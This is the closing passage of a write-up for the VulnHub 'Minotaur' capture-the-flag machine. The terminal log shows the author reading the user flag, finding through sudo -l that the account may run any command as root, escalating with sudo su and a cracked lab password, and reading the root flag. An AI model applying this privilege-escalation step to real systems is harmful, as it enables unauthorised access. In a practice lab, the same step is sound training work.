-rw-r--r-- 1 minotaur minotaur 675 May 14 2015 .profile
minotaur@minotaur:~$ cat flag.txt
cat flag.txt
Congrats! You've found the first flag:
M355 W17H T3H 8ULL, G37 73H H0RN!
But can you get /root/flag.txt ?
minotaur@minotaur:~$ sudo -l
sudo -l
Matching Defaults entries for minotaur on minotaur:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User minotaur may run the following commands on minotaur:
(root) NOPASSWD: /root/bullquote.sh
(ALL : ALL) ALL
What's this - we can sudo as any user, for any command? I'll take it!
minotaur@minotaur:~$ sudo su
sudo su
[sudo] password for minotaur: obiwan6
root@minotaur:/home/minotaur# cd /root
cd /root
root@minotaur:~# ls -lah
ls -lah
total 40K
drwx------ 5 root root 4.0K May 27 2015 .
drwxr-xr-x 21 root root 4.0K May 14 2015 ..
lrwxrwxrwx 1 root root 9 May 27 2015 .bash_history -> /dev/null
-rw-r--r-- 1 root root 3.1K Feb 20 2014 .bashrc
drwx------ 2 root root 4.0K May 15 2015 .cache
-rw------- 1 root root 70 May 27 2015 flag.txt
-rw------- 1 root root 22 May 27 2015 .gdbinit
drwxr-xr-x 4 root root 4.0K May 27 2015 peda
-rw-r--r-- 1 root root 140 Feb 20 2014 .profile
-rwx------ 1 root root 845 May 15 2015 quotes.txt
drwx------ 2 root root 4.0K May 27 2015 .ssh
root@minotaur:~# cat flag.txt
cat flag.txt
Congrats! You got the final flag!
Th3 Fl@g is: 5urr0nd3d bY @r$3h0l35
Conclusion
Overall, I was surprised at the last step. We had gdb-peda installed, so every part of me expected this to include a binary challenge. All in all, a nice little challenge. I learnt a nice trick with regards to generating word lists from a pre-existing list, so that was great.
Thanks Robert Winkel for the image, and as always, thank you VulnHub for hosting it!